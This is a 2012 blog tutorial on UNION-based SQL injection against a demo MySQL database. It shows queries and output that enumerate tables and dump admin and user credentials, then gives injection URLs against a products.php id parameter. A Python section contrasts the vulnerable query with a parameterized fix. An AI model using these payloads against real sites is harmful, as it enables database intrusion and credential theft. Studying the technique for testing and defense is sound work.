Saturday, July 7, 2012

Dumping The Database

Okay, now that we know which tables are in the database, we will try to dump the contents of a table.

So, as we know, we have 3 tables in the 'ckorner' database, viz. 'admin', 'products' and 'users'.

And we also know that the columns of 'admin' are 'id', 'name' and 'pwd'. Let's now try dumping the records.

So our URL is

www.example.com/products.php?id = 1

The developer's side is on the left-hand side of the '=' and the right-hand side is for us.

Let's try to frame the query on the MySQL server.

The Normal Query:

mysql> select id, product, price from products where id=1;
+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer |  2500 |
+------+---------+-------+
1 row in set (0.00 sec)

mysql>

Now our fuzzing starts:

mysql> select id, product, price from products where id= 1 union select 1,2,table_name from information_schema.tables where table_schema='ckorner';
+------+---------+----------+
| id   | product | price    |
+------+---------+----------+
|    1 | printer | 2500     |
|    1 | 2       | admin    |
|    1 | 2       | products |
|    1 | 2       | users    |
+------+---------+----------+
4 rows in set (0.00 sec)

mysql> select id, product, price from products where id= 1 union select 1,2,column_name from information_schema.columns where table_name='admin';
+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer | 2500  |
|    1 | 2       | id    |
|    1 | 2       | name  |
|    1 | 2       | pwd   |
+------+---------+-------+
4 rows in set (0.00 sec)

mysql> select id, product, price from products where id= 1 union select 1,2,id from ckorner.admin;
+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer |  2500 |
|    1 | 2       |     1 |
|    1 | 2       |     2 |
|    1 | 2       |     3 |
+------+---------+-------+
4 rows in set (0.00 sec)

mysql> select id, product, price from products where id = 1 union select 1,2,name from ckorner.admin;
+------+---------+---------+
| id   | product | price   |
+------+---------+---------+
|    1 | printer | 2500    |
|    1 | 2       | whiskey |
|    1 | 2       | Kumar   |
|    1 | 2       | Onty    |
+------+---------+---------+
4 rows in set (0.00 sec)

mysql> select id, product, price from products where id = 1 union select 1,2,pwd from ckorner.admin;
+------+---------+-------------+
| id   | product | price       |
+------+---------+-------------+
|    1 | printer | 2500        |
|    1 | 2       | whiskey@123 |
|    1 | 2       | kumar@123   |
|    1 | 2       | Onty@123    |
+------+---------+-------------+
4 rows in set (0.00 sec)

mysql> select id, product, price from products where id= 1 union select 1,2,concat(name, pwd) from ckorner.admin;
+------+---------+--------------------+
| id   | product | price              |
+------+---------+--------------------+
|    1 | printer | 2500               |
|    1 | 2       | whiskeywhiskey@123 |
|    1 | 2       | Kumarkumar@123     |
|    1 | 2       | OntyOnty@123       |
+------+---------+--------------------+
4 rows in set (0.00 sec)

mysql> select id, product, price from products where id= 1 union select 1,2,group_concat(name, pwd) from ckorner.admin;
+------+---------+------------------------------------------------+
| id   | product | price                                          |
+------+---------+------------------------------------------------+
|    1 | printer | 2500                                           |
|    1 | 2       | whiskeywhiskey@123,Kumarkumar@123,OntyOnty@123 |
+------+---------+------------------------------------------------+
2 rows in set (0.00 sec)

mysql> select id, product, price from products where id = 9 union select 1,2,group_concat(id, product, price) from ckorner.products;
+------+---------+-------------------------------------------------------+
| id   | product | price                                                 |
+------+---------+-------------------------------------------------------+
|    1 | 2       | 1printer2500,2Laptop15000,3Desktop25000,4pen-drive300 |
+------+---------+-------------------------------------------------------+
1 row in set (0.00 sec)

mysql> select id, product, price from products where id = 9 union select 1,2,group_concat(id, name, pwd) from ckorner.users;
+------+---------+---------------------------------------------------------+
| id   | product | price                                                   |
+------+---------+---------------------------------------------------------+
|    1 | 2       | 1Rishabhrishabh@123,2Web Rulerweb@123,3Mafiozimafia@123 |
+------+---------+---------------------------------------------------------+
1 row in set (0.00 sec)

mysql>


So we see here that if we know the database name, the table name and the columns in the table, we can dump the contents.

Now let's build the same in our URL:

www.example.com/products.php?id = 1 union select 1,2,group_concat(id, name, pwd) from ckorner.users --+

In case the above result doesn't dump the contents, as before we need to give an ID that does not exist in the table; I prefer using negative values.

www.example.com/products.php?id = -1 union select 1,2,group_concat(id, name, pwd) from ckorner.users --+

And this would dump all the id, name and pwd records from the 'users' table in the 'ckorner' database.
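To see the same thing from the developer's side, here is an added example (not code from the original post) in Python with an in-memory SQLite stand-in for the 'ckorner' database: vulnerable_lookup does what products.php does, gluing the request value into the query text, while safe_lookup validates and binds the value instead. The payload is the page's last URL adapted to SQLite syntax (|| in place of the multi-argument group_concat).

```python
import sqlite3

# Constructed stand-in for the 'ckorner' database on the page (SQLite, in memory).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("ATTACH DATABASE ':memory:' AS ckorner")
    con.executescript("""
        CREATE TABLE ckorner.products (id INTEGER, product TEXT, price INTEGER);
        INSERT INTO ckorner.products VALUES (1, 'printer', 2500), (2, 'Laptop', 15000);
        CREATE TABLE ckorner.users (id INTEGER, name TEXT, pwd TEXT);
        INSERT INTO ckorner.users VALUES (1, 'Rishabh', 'rishabh@123'), (2, 'Web Ruler', 'web@123');
    """)
    return con

def vulnerable_lookup(con, raw_id):
    # What products.php is doing: the request value is pasted into the SQL text,
    # so a value containing 'union select ...' becomes part of the query itself.
    sql = "select id, product, price from products where id = " + raw_id
    return con.execute(sql).fetchall()

def safe_lookup(con, raw_id):
    # Hardened form: reject anything that is not an integer, then bind the value
    # as a parameter, so it is always treated as data and never as SQL.
    try:
        pid = int(raw_id)
    except ValueError:
        return []
    sql = "select id, product, price from products where id = ?"
    return con.execute(sql, (pid,)).fetchall()

# The page's last payload, adapted to SQLite: a non-existent id so only the
# union rows come back, and || instead of group_concat(id, name, pwd).
PAYLOAD = "-1 union select 1, 2, group_concat(id || name || pwd) from ckorner.users"

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, PAYLOAD))  # users table leaks through the price column
    print(safe_lookup(db, PAYLOAD))        # [] : the payload is rejected as a non-integer
    print(safe_lookup(db, "1"))            # [(1, 'printer', 2500)]
```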

Hope this was informative. Stay tuned for more.
